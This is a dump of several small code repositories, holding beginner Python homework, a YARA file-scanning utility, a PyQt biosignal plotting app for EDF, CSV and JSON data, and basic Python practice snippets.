[ { "alpha_fraction": 0.5227272510528564, "alphanum_fraction": 0.6439393758773804, "avg_line_length": 25, "blob_id": "702830e72b5149a325338c97050286024eabd4d5", "content_id": "23a55904ed5a68b1540ec8ea310384b12778a16b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 151, "license_type": "no_license", "max_line_length": 36, "num_lines": 5, "path": "/2.py", "repo_name": "Shamp8/Homework_python", "src_encoding": "UTF-8", "text": "time=int(input(\"Задайте секунды: \"))\nhour = time//3600\nmin = time%3600//60\nsec = time%3600%60\nprint(f\"время: {hour}:{min}:{sec}\")\n\n\n" }, { "alpha_fraction": 0.5980392098426819, "alphanum_fraction": 0.5980392098426819, "avg_line_length": 24.75, "blob_id": "2ad532e088bd93bf10d0e3716f8d6ad788b223a3", "content_id": "fcece15a5eb6071f981b5d2069712a0a9ad59510", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 118, "license_type": "no_license", "max_line_length": 35, "num_lines": 4, "path": "/1.py", "repo_name": "Shamp8/Homework_python", "src_encoding": "UTF-8", "text": "name = input(\"Ведите Ваше имя: \")\nage = input(\"Ведите Ваш возраст: \")\nprint(\"name = \",name)\nprint(\"age = \",age)" }, { "alpha_fraction": 0.6000000238418579, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 15, "blob_id": "12632b3fefca57601f68ba812fb94632983074fc", "content_id": "0ace858be66706f517316a6e75e66815ed78f1d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 95, "license_type": "no_license", "max_line_length": 33, "num_lines": 5, "path": "/3.py", "repo_name": "Shamp8/Homework_python", "src_encoding": "UTF-8", "text": "n = input('Задайте значение n: ')\na=n+n\nb=n+n+n\nc=int(a)+int(b)+int(n)\nprint(c)\n" }, { "alpha_fraction": 0.6580311059951782, "alphanum_fraction": 0.6787564754486084, "avg_line_length": 26.285715103149414, "blob_id": "d322f21ccc4f79bc30b3ee2353c4396b06654b6f", "content_id": "da814d3c9e89cb1d886505ac4db48e7c1a52337c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 283, "license_type": "no_license", "max_line_length": 56, "num_lines": 7, "path": "/6.py", "repo_name": "Shamp8/Homework_python", "src_encoding": "UTF-8", "text": "x=int(input(\"Введите дистанцию первой пробежки \"))\ny=int(input(\"Введите целевую дистанцию \"))\ni=1\nwhile x<=y:\n x=x+x*0.1\n i=i+1\nprint(\"Для достижения результата необходимо\", i, \"дней\")\n\n\n" }, { "alpha_fraction": 0.7078651785850525, "alphanum_fraction": 0.7078651785850525, "avg_line_length": 35.91666793823242, "blob_id": "3cdb96860333f4c741599a401d5fcd15b24be1f3", "content_id": "086fb2faee0bb029501581acd5be57bb25a6df5c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 590, "license_type": "no_license", "max_line_length": 71, "num_lines": 12, "path": "/5.py", "repo_name": "Shamp8/Homework_python", "src_encoding": "UTF-8", "text": "revenues=int(input(\"Какая у Вас выручка? \"))\ncost=int(input(\"Какие издержки? \"))\nif revenues<cost:\n print(\"К сожалению, Вы в убытке\")\nelif revenues==cost:\n print(\"Вы работаете в ноль\")\nelse:\n profit=revenues/cost\n employees=int(input(\"Сколько у Вас работников? \"))\n profitonempoyee=revenues//employees\n print(\"Соотношение прибыли к выручке - \", profit)\n print(\"Прибыль на одного сотрудника составила - \", profitonempoyee)\n\n\n" } ]
5
Trietptm-on-Security/yara_scan
https://github.com/Trietptm-on-Security/yara_scan
656eb5de2c41a9c448276f552b46d8de7e57b820
067d7528a6e3e2447f0473df30ccab3c864624b6
0e4baf77073c04786d34792c3c4f8ec9a9c43e92
refs/heads/master
2017-05-26T03:13:41.278489
2016-07-25T22:20:13
2016-07-25T22:20:13
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5283939838409424, "alphanum_fraction": 0.5297249555587769, "avg_line_length": 30.746479034423828, "blob_id": "e64c769cbcab7eee72d08971ed8cc56184720307", "content_id": "f8072cb634668d43140ccab85d149aa6fa95624f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2254, "license_type": "permissive", "max_line_length": 113, "num_lines": 71, "path": "/yara_scan.py", "repo_name": "Trietptm-on-Security/yara_scan", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os\nimport sys\nimport argparse\nimport yara\n# yara_scan\n# usage: python yara_scan.py -y <yara_rule_dir> [-s <scan_files_dir> (optional otherwise current dir is scanned)]\n\n__author__ = \"Tyler Halfpop\"\n__version__ = \"0.2\"\n\ndef parse_arguments():\n parser = argparse.ArgumentParser(usage=\"Scan Files in a Directory with Yara Rules\")\n parser.add_argument('-y', '--yara_dir',\n action='store',\n help='Path to Yara rules directory')\n\n parser.add_argument('-s', '--scan_dir',\n action='store',\n default=os.getcwd(),\n help='Path to the directory of files to scan')\n\n return parser\n\nclass YaraClass:\n def __init__(self, arg_yara_dir, arg_scan_dir):\n try:\n self.scan_dir = arg_scan_dir\n self.yara_dir = arg_yara_dir\n except Exception as e:\n print \"Init Exception: {}\".format(e)\n\n def compile(self):\n try:\n all_rules = {}\n for root, directories, files in os.walk(self.yara_dir):\n for file in files:\n if \"yar\" in os.path.splitext(file)[1]:\n rule_case = os.path.join(root,file) \n if self.test_rule(rule_case):\n all_rules[file] = rule_case\n self.rules = yara.compile(filepaths=all_rules)\n except Exception as e:\n print \"Compile Exception: {}\".format(e)\n\n def test_rule(self, test_case):\n try:\n testit = yara.compile(filepath=test_case)\n return True\n except:\n print \"{} is an invalid rule\".format(test_case)\n return False\n\n def scan(self):\n try:\n for root, directories, files in os.walk(self.scan_dir):\n for file in files:\n matches = self.rules.match(os.path.join(root,file))\n print \"{}\\n{}\\n\".format(file, matches)\n except Exception as e:\n print \"Scan Exception: {}\".format(e)\n\ndef main():\n args = parse_arguments().parse_args()\n\n ys = YaraClass(args.yara_dir, args.scan_dir) \n ys.compile()\n ys.scan()\n\nif __name__ == \"__main__\":\n main()\n" } ]
1
adel-elmala/SigView
https://github.com/adel-elmala/SigView
6c256144ebd6be5a20e118f4c6c68d686f500abe
5f58e45b54f7edfeb835043b006ace9e73c1d4d3
3e996f1b2ce3b1030614445a0dbcc0e591cfbacf
refs/heads/master
2022-04-08T13:45:03.792200
2020-02-20T18:04:47
2020-02-20T18:04:47
240,602,063
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5362087488174438, "alphanum_fraction": 0.5857294797897339, "avg_line_length": 22.424999237060547, "blob_id": "d7dd5c98d8e8b3d7d9a814274079f7ea3be35ebf", "content_id": "851278f1edb05ebc0c3db8f328c9c2b27df22f83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1878, "license_type": "no_license", "max_line_length": 56, "num_lines": 80, "path": "/main.py", "repo_name": "adel-elmala/SigView", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 14 20:54:30 2020\n\n@author: adel\nDriver program\n\"\"\"\nimport identify\nimport matplotlib.pyplot as plt\n#get file name\njsonfile = \"ecgjson.json\"\ncsvfile = \"arrhythmia_csv.csv\"\nedffile = \"Normal_Subject_01.edf\"\n\nfileName , fileExtension = identify.identFile(jsonfile)\n\ndef redirectPlot(fileExtension):\n if fileExtension.lower() == '.json':\n plotJson(identify.redirect(jsonfile))\n elif fileExtension.lower() == '.edf':\n plotEdf(identify.redirect(edffile)) \n elif fileExtension.lower() == '.csv': \n plotCsv(identify.redirect(csvfile))\n else:\n raise ValueError(\"File Extension Not Supported\")\n \ndef plotJson(tuple):\n mypanda,time,ecg = tuple\n fig , ax = plt.subplots()\n ax.plot(mypanda[:500])\n \ndef plotEdf(tuple):\n #plotting 5 channels \n fig,ax=plt.subplots(5,1)\n ch1,ch2,ch3,ch4,ch5,name = tuple\n \n x0 =len(ch1) \n x1 =len(ch2) \n x2 =len(ch3)\n x3 =len(ch4)\n x4 =len(ch5)\n ax[0].plot(ch1.iloc[1:x0,],color = 'r')\n ax[1].plot(ch2.iloc[1:x1,])\n ax[2].plot(ch3.iloc[1:x2,])\n ax[3].plot(ch4.iloc[1:x3,])\n ax[4].plot(ch5.iloc[1:x4,])\n plt.xlabel('time (s)')\n ax[0].set_ylabel(name[0])\n ax[1].set_ylabel(name[1])\n ax[2].set_ylabel(name[2])\n ax[3].set_ylabel(name[3])\n ax[4].set_ylabel(name[14])\n plt.legend(loc='best')\n plt.show()\n \n # def zoomIn():\n # x0 /= 2\n # x1 /= 2\n # x2 /= 2\n # x3 /= 2\n # x4 /= 2\n \n #zoomIn()\n #plotEdf(tuple)\n #plt.show()\n \ndef plotCsv(tuple):\n csvpanda = tuple \n fig,(ax1,ax2) = plt.subplots(2,sharey=True)\n ax1.plot(csvpanda[0:200])\n ax2.plot(csvpanda[125:150]) #zoomed \n plt.show() #Display the plot\n \n\n\n#tests \nredirectPlot('.edf')\nredirectPlot('.csv')\nredirectPlot('.json')\n " }, { "alpha_fraction": 0.6677042841911316, "alphanum_fraction": 0.6961089372634888, "avg_line_length": 45.70909118652344, "blob_id": "21c48387a716b094572ca64dbf422208c5520447", "content_id": "da7c3a67300a6858e501a55584ee10b4b01f6011", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2570, "license_type": "no_license", "max_line_length": 73, "num_lines": 55, "path": "/design.py", "repo_name": "adel-elmala/SigView", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file 'design.ui'\n#\n# Created by: PyQt5 UI code generator 5.10.1\n#\n# WARNING! 
All changes made in this file will be lost!\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom pyqtgraph import PlotWidget\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(487, 389)\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.Openfile = QtWidgets.QPushButton(self.centralwidget)\n self.Openfile.setGeometry(QtCore.QRect(20, 10, 81, 51))\n self.Openfile.setObjectName(\"Openfile\")\n self.plotWindow = PlotWidget(self.centralwidget)\n self.plotWindow.setGeometry(QtCore.QRect(5, 71, 481, 281))\n self.plotWindow.setObjectName(\"plotWindow\")\n self.Play = QtWidgets.QPushButton(self.centralwidget)\n self.Play.setGeometry(QtCore.QRect(110, 10, 71, 51))\n self.Play.setObjectName(\"Play\")\n self.Stop = QtWidgets.QPushButton(self.centralwidget)\n self.Stop.setGeometry(QtCore.QRect(190, 10, 71, 51))\n self.Stop.setObjectName(\"Stop\")\n self.Zoomin = QtWidgets.QPushButton(self.centralwidget)\n self.Zoomin.setGeometry(QtCore.QRect(270, 10, 71, 51))\n self.Zoomin.setObjectName(\"Zoomin\")\n self.Zoomout = QtWidgets.QPushButton(self.centralwidget)\n self.Zoomout.setGeometry(QtCore.QRect(350, 10, 71, 51))\n self.Zoomout.setObjectName(\"Zoomout\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 487, 22))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\n self.Openfile.setText(_translate(\"MainWindow\", \"openfile\"))\n self.Play.setText(_translate(\"MainWindow\", \"play\"))\n self.Stop.setText(_translate(\"MainWindow\", \"stop\"))\n self.Zoomin.setText(_translate(\"MainWindow\", \"zoom in\"))\n self.Zoomout.setText(_translate(\"MainWindow\", \"zoom out\"))\n\n" }, { "alpha_fraction": 0.6423760056495667, "alphanum_fraction": 0.684629499912262, "avg_line_length": 28.160715103149414, "blob_id": "8f7f8264fdcc755b7649ccb52f3596b56922e6a3", "content_id": "37e00c2f5d48a60581c1c4f6e3e2c1c968878b9e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1633, "license_type": "no_license", "max_line_length": 106, "num_lines": 56, "path": "/edfFuncs.py", "repo_name": "adel-elmala/SigView", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 11 17:12:28 2020\n\n@author: adel\n\nREAD EDF FILE AND RETURN 5 channels DataFrame + chs_names (all in tuple)\n\"\"\"\n#%matplotlib inline\n#import matplotlib.pyplot as plt\n#import plotly.plotly as py\n#import numpy as np\nimport mne\nimport pandas as pd\n#from plotly import tools\n#from plotly.graph_objs import Layout, YAxis, Scatter, Annotation, Annotations, Data, Figure, Marker, Font\n#plt.ion()\n\nedffilename = \"Normal_Subject_01.edf\"\ndef ReadEdf(edffilename):\n mne.set_log_level(\"WARNING\")\n raw = mne.io.read_raw_edf(edffilename, preload=False)\n #raw.plot()\n start, stop = raw.time_as_index([100, 115]) # 100 s to 115 s data segment\n \n picks = mne.pick_types(raw.info,include=(raw.ch_names))\n n_channels = 
len(raw.ch_names)\n data, times = raw[picks[:n_channels], start:stop]\n ch_names = [raw.info['ch_names'][p] for p in picks[:n_channels]]\n edfPanda1 = pd.DataFrame(data[0],times)\n edfPanda2 = pd.DataFrame(data[1],times)\n edfPanda3 = pd.DataFrame(data[2],times)\n edfPanda4 = pd.DataFrame(data[3],times)\n edfPanda5 = pd.DataFrame(data[14],times)\n return(edfPanda1,edfPanda2,edfPanda3,edfPanda4,edfPanda5,ch_names)\n#print(data.shape)\n#print(times.shape)\n#print(times.min(), times.max())\n#print(picks)\n\n#plt.plot(times[1:55], data.T[1:55])\n\n\n#plotting 5 channels \n#fig,ax=plt.subplots(5,1)\n#ch1,ch2,ch3,ch4,ch5,name = ReadEdf(edffilename)\n#ax[0].plot(ch1,color = 'r')\n#ax[1].plot(ch2)\n#ax[2].plot(ch3)\n#ax[3].plot(ch4)\n#ax[4].plot(ch5)\n#plt.xlabel('time (s)')\n#plt.ylabel('MEG data (T)')\n#plt.legend(loc='best')\n#plt.show()\n" }, { "alpha_fraction": 0.6208742260932922, "alphanum_fraction": 0.635147213935852, "avg_line_length": 23.288888931274414, "blob_id": "6a8b0027cb23d82cc17c8cac58ffbea8fb7992c3", "content_id": "b628801da48a7e63cf35e5b0d4df90632fe7bdf3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1121, "license_type": "no_license", "max_line_length": 57, "num_lines": 45, "path": "/identify.py", "repo_name": "adel-elmala/SigView", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 14 17:12:24 2020\n\n@author: adel\n\n\nidentify the file extension\n\"\"\"\nimport jsonFuncs\nimport csvFuncs\nimport edfFuncs\nimport os\n\n#make a function t retrive filename from GUI\njsonfile = \"ecgjson.json\"\ncsvfile = \"arrhythmia_csv.csv\"\nedffile = \"Normal_Subject_01.edf\"\n#extracting the file name & extension\ndef identFile(filename):\n filename, file_extension = os.path.splitext(filename)\n return (filename, file_extension)\n \n#name , exten = identFile(file) \n#redirecting to it's opening func\n\ndef redirect(filename):\n name , extension = identFile(filename)\n if extension.lower() == '.json':\n print('JSON READ')\n return jsonFuncs.ReadJson(filename)\n \n elif extension.lower() == '.csv':\n #readCsv(file)\n print('CSV READ')\n return csvFuncs.ReadCsv(filename)\n \n elif extension.lower() == '.edf':\n #readEdf(file)\n print('EDF READ')\n return edfFuncs.ReadEdf(filename)\n \n else:\n raise NameError('File Extension not supported')\n\n\n \n \n " }, { "alpha_fraction": 0.5909990072250366, "alphanum_fraction": 0.6003956198692322, "avg_line_length": 26.91428565979004, "blob_id": "634685f7f354ed642d83b152aba258721d733ede", "content_id": "83e4c3a410d0bf6f9754e405215c5f03a9eca5ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2022, "license_type": "no_license", "max_line_length": 72, "num_lines": 70, "path": "/starter_file.py", "repo_name": "adel-elmala/SigView", "src_encoding": "UTF-8", "text": "from PyQt5 import QtWidgets, QtCore\r\nfrom PyQt5.QtWidgets import QFileDialog\r\nfrom design import Ui_MainWindow\r\nimport sys\r\nimport pyqtgraph as pg\r\nimport sys\r\nimport numpy as np\r\n\r\n\r\nclass ApplicationWindow(QtWidgets.QMainWindow):\r\n signal = list()\r\n cur = 0\r\n flag = 1\r\n ran = 50\r\n def __init__(self):\r\n super(ApplicationWindow, self).__init__()\r\n self.ui = Ui_MainWindow()\r\n self.ui.setupUi(self)\r\n \r\n self.timer = QtCore.QTimer()\r\n self.timer.setInterval(10)\r\n self.timer.timeout.connect(self.pan)\r\n self.timer.start()\r\n \r\n \r\n \r\n def open_dialog_box(self):\r\n 
print(\"heelll\")\r\n filename = QFileDialog.getOpenFileName()\r\n path = filename[0]\r\n signal = np.genfromtxt(path , delimiter=',')\r\n self.ui.plotWindow.plot(list(range(len(signal))), signal)\r\n self.ui.plotWindow.setXRange(self.cur, self.cur + self.ran)\r\n \r\n \r\n def pan(self):\r\n if not self.flag:\r\n self.ui.plotWindow.setXRange(self.cur, self.cur + self.ran)\r\n self.cur = self.cur + 0.1\r\n \r\n def play(self):\r\n self.flag = 0\r\n \r\n def pause(self):\r\n self.flag = 1\r\n \r\n def zoomin(self):\r\n self.ran = max(5, self.ran - 5)\r\n self.ui.plotWindow.setXRange(self.cur, self.cur + self.ran)\r\n \r\n def zoomout(self):\r\n self.ran = min(100, self.ran + 5)\r\n self.ui.plotWindow.setXRange(self.cur, self.cur + self.ran)\r\n \r\n \r\n\r\ndef main():\r\n app = QtWidgets.QApplication(sys.argv)\r\n application = ApplicationWindow()\r\n application.ui.Play.clicked.connect(application.play)\r\n application.ui.Stop.clicked.connect(application.pause)\r\n application.ui.Openfile.clicked.connect(application.open_dialog_box)\r\n application.ui.Zoomin.clicked.connect(application.zoomin)\r\n application.ui.Zoomout.clicked.connect(application.zoomout)\r\n application.show()\r\n app.exec_()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()" }, { "alpha_fraction": 0.6347699165344238, "alphanum_fraction": 0.6493791341781616, "avg_line_length": 24.27777862548828, "blob_id": "257262477b208a2c5298edb063eaec752a30db88", "content_id": "75468576942510a7eb5296c4568726d7ba335c9f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1369, "license_type": "no_license", "max_line_length": 88, "num_lines": 54, "path": "/jsonFuncs.py", "repo_name": "adel-elmala/SigView", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 14 09:52:57 2020\n\n@author: adel\n\nplotting JSON files\nreads the json file & proccess it\n& returns a panda(dataframe) of time and ecg readings\n\"\"\"\n#import identify\n\n\nimport pandas as pd\n#from pandas.io.json import json_normalize\nimport json\nimport codecs\n#import matplotlib.pyplot as plt\n\n#name1 ,exten1 = identify.identFile('hola.json')\n\njsonfilename = 'ecgjson.json'\n\n#reads the json file & proccess it & returns a panda(dataframe) of time and ecg readings\ndef ReadJson(jsonfilename):\n data = json.load(codecs.open(jsonfilename, 'r', 'utf-8-sig'))\n dataframe = pd.DataFrame.from_dict(data)\n ecg_dict = dataframe['ecg']['ECG']\n \n ecg_time_list =[]\n ecg_vals_list =[]\n\n for item in ecg_dict:\n ecg_time_list.append(list(item.keys()))\n ecg_vals_list.append(list(item.values()))\n\n flat_time_list = []\n flat_ecg_list = []\n\n def flatten(l,fl):\n for sublist in l:\n for item in sublist:\n fl.append(item) \n \n flatten(ecg_time_list,flat_time_list)\n flatten(ecg_vals_list,flat_ecg_list) \n jsonPanda = pd.DataFrame(flat_ecg_list,flat_time_list)\n \n return (jsonPanda,flat_time_list,flat_ecg_list)\n#mypanda,time,ecg = ReadJson(jsonfilename)\n \n#fig , ax = plt.subplots()\n#ax.plot(mypanda[:500])\n " }, { "alpha_fraction": 0.6133333444595337, "alphanum_fraction": 0.6836363673210144, "avg_line_length": 17.75, "blob_id": "0f0afbb3b739588594dd4a5680eb6935be479ed7", "content_id": "66e1b98e0596a0f11101b3106757a3b491d8f995", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 825, "license_type": "no_license", "max_line_length": 45, "num_lines": 44, "path": "/csvFuncs.py", "repo_name": "adel-elmala/SigView", 
"src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 13 22:21:20 2020\n\n@author: adel\n\nplotting CSV files\n\n\"\"\"\n\n#1 - identifiy file extension DONE\n#2 - read the file and proccess it \n#3 - plot the data\n#4 - \nimport pandas as pd\n#import matplotlib.pyplot as plt\n\ncsvfilename = \"arrhythmia_csv.csv\"\n\ndef ReadCsv(csvfilename):\n dataset = pd.read_csv(csvfilename)\n return dataset[\"heartrate\"]\n \n\n#csvpanda = ReadCsv(csvfilename)\n\n\n\n#ax1.set_title(\"ZOOM\") #The title of our plot\n#plt.xticks(range(0, 100,5))\n#ax2.set_xlabel(\"Heart Rate Signal\") \n#ax1.plot(dataset[50:350])\n#ax2.plot(dataset[x:y]) #Draw the plot object\n#ax1.yticks(range(0,105,25))\n\n#x=0\n#y=600\n\n\n#fig,(ax1,ax2) = plt.subplots(2,sharey=True)\n#ax1.plot(csvpanda[0:200])\n#ax2.plot(csvpanda[125:150]) #zoomed \n#plt.show() #Display the plot\n" } ]
7
rohithbt/python_rohit89
https://github.com/rohithbt/python_rohit89
16514486e95f3356caecdf5331ba5e086dc3bb77
c4ea7c0fa3100d0b5996de339b2774fd03e2db63
94cb1bc3978084146fcc393f2ade26c5d3fa7eee
refs/heads/master
2022-08-01T06:50:53.897865
2020-05-28T05:45:13
2020-05-28T05:45:13
264,086,308
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6000000238418579, "alphanum_fraction": 0.6600000262260437, "avg_line_length": 9.199999809265137, "blob_id": "b42d91722d479ce9dd471cc140c77f715c47f88a", "content_id": "570f434639dc37a27ac53b81e458eadc054e22b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 50, "license_type": "no_license", "max_line_length": 14, "num_lines": 5, "path": "/logical.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "a=5\nb=10\nprint(a and b)\nprint(a or b)\nprint(not a)" }, { "alpha_fraction": 0.6022727489471436, "alphanum_fraction": 0.6136363744735718, "avg_line_length": 21, "blob_id": "e2e535a3d1da60db075ee96d65c7feb90cc1a5ff", "content_id": "57fbea64ba86d2b8d4603d0073216e9bfbd8fde5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 88, "license_type": "no_license", "max_line_length": 33, "num_lines": 4, "path": "/replacestring.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "str=\"rohith\"\nprint(str.replace('r','--R--',1))\nprint(str.upper())\nprint(str.index('i'))\n" }, { "alpha_fraction": 0.59375, "alphanum_fraction": 0.65625, "avg_line_length": 15.5, "blob_id": "7c5d309a275e5595f64788313fd8cb4a38c75d86", "content_id": "0e522d39547976ef72038ce582c417cf0ca88297", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 32, "license_type": "no_license", "max_line_length": 18, "num_lines": 2, "path": "/lambda.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "ans=(lambda z:z*4)\nprint(ans(7))" }, { "alpha_fraction": 0.4935064911842346, "alphanum_fraction": 0.5454545617103577, "avg_line_length": 10.142857551574707, "blob_id": "c7484c50d6d28778342ae8414ccd79f936dd8510", "content_id": "bd2e6e0981b9327252f1dee36730fcff0bc0c24f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 77, "license_type": "no_license", "max_line_length": 16, "num_lines": 7, "path": "/functionexample1.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "def add(a,b):\n sum=a+b\n\n return(sum)\n\nprint (add(1,3))\nprint (add(2,4))" }, { "alpha_fraction": 0.6637930870056152, "alphanum_fraction": 0.6637930870056152, "avg_line_length": 15.714285850524902, "blob_id": "4daa4c8136f2bdd78917d37d3d42122c99b22cff", "content_id": "4bec4eba8037ff0918abd7cea3120bf96512bd5c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 116, "license_type": "no_license", "max_line_length": 34, "num_lines": 7, "path": "/function2.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "def print_name(str):\n print(\"welocme to python\",str)\n return()\n\n\nstr=input(\"enter your name:\")\nprint_name(str)" }, { "alpha_fraction": 0.5785123705863953, "alphanum_fraction": 0.64462810754776, "avg_line_length": 14.25, "blob_id": "722c07112e29db3f333aea9b504076294273713a", "content_id": "3d61afb9717dd4edc5b1aea66f934c49fae2f575", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 121, "license_type": "no_license", "max_line_length": 29, "num_lines": 8, "path": "/converttuple.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "tuple=(1,2,3,4,5,'a','b','c')\nlst=list(tuple)\nprint(tuple)\n\nlst[1]='python'\nprint(lst)\n#$tuple2=tuple(lst)\n#print(tuple2)" }, { 
"alpha_fraction": 0.4904458522796631, "alphanum_fraction": 0.5923566818237305, "avg_line_length": 14.800000190734863, "blob_id": "eed31fbe7e6df6776047e78b57fd97af8b806da1", "content_id": "c13b2185aaa0a1a6b4077235ae4fb144be343037", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 157, "license_type": "no_license", "max_line_length": 38, "num_lines": 10, "path": "/tup_operator.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "tup=('home','quarantine','corona','2')\nprint(len(tup))\nprint(max(tup))\nprint(min(tup))\n\n\n\ntup1=([0,1,2],[1,2,3],[3,4,5,6])\ntup1[0][0] = 'updated'\nprint(tup1)" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 5.375, "blob_id": "9510e7f6119eb59bfeb87a5329c9a3d0a72287b2", "content_id": "3b09fb1dfa7c59e20d2d21d98d43ee4dfa4ab4ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 50, "license_type": "no_license", "max_line_length": 16, "num_lines": 8, "path": "/dir.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "import math\n\na = 1\nb =[]\n\nc=2311\n\nprint(dir(math))" }, { "alpha_fraction": 0.6321243643760681, "alphanum_fraction": 0.6787564754486084, "avg_line_length": 21.764705657958984, "blob_id": "2e310f21c9d73fec3a574c415fd1e012515e7aa7", "content_id": "844fedccf362610d8c1fb8d0d17b220440c35042", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 386, "license_type": "no_license", "max_line_length": 94, "num_lines": 17, "path": "/list.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "A=[]\nA=[1,2,3,4]\nprint(A)\nprint(A[1])\nprint(A[3]) \nA[1] = \"u can change the list element\"\nprint(A[1])\n\n\nB=[[1,2,3], 4 ,'third element',(1,2,3,4)] #A list can contain a list inside as well as a tuple\nprint(B)\nprint(B[3][3])\n\n#lists are enclosed with brackets[] and tuples with paranthesis()\n#lists are mutable(cant change)\n#tuples are immutable(can change)\n#tuples are faster than lists" }, { "alpha_fraction": 0.7002881765365601, "alphanum_fraction": 0.7089337110519409, "avg_line_length": 27.91666603088379, "blob_id": "69568f4e12c8a8ca82c29bae0b27ab16b633bd9e", "content_id": "ce311a2cf4fb7a942ff06050b8cf3b71592821cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 347, "license_type": "no_license", "max_line_length": 60, "num_lines": 12, "path": "/operation_file.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "import os\nnewfile=open(\"kor.txt\",\"w+\") #write the file\n#newfile.close()\nprint(newfile.mode) #it will display the mode of file\nprint(newfile.name)\n#print(newfile.softspace)\n\n#for i in range(0,10):\n# newfile.write(\"\\n Hello,Welcome to python\")\n\n#os.rename(\"kora.txt\",\"ro.txt\") #this is for renaming a file\n#os.remove(\"ro.txt\") to remove the file " }, { "alpha_fraction": 0.4615384638309479, "alphanum_fraction": 0.5128205418586731, "avg_line_length": 12, "blob_id": "2b7aabe3cf1bb47f02ed94c9d2f2adea213b17b7", "content_id": "b4e0776b494977ecb731bc5f62613e3c2d03d8b5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 117, "license_type": "no_license", "max_line_length": 30, "num_lines": 9, "path": "/global1.py", "repo_name": "rohithbt/python_rohit89", "src_encoding": "UTF-8", "text": "a=30\ndef add(b):\n c=30\n 
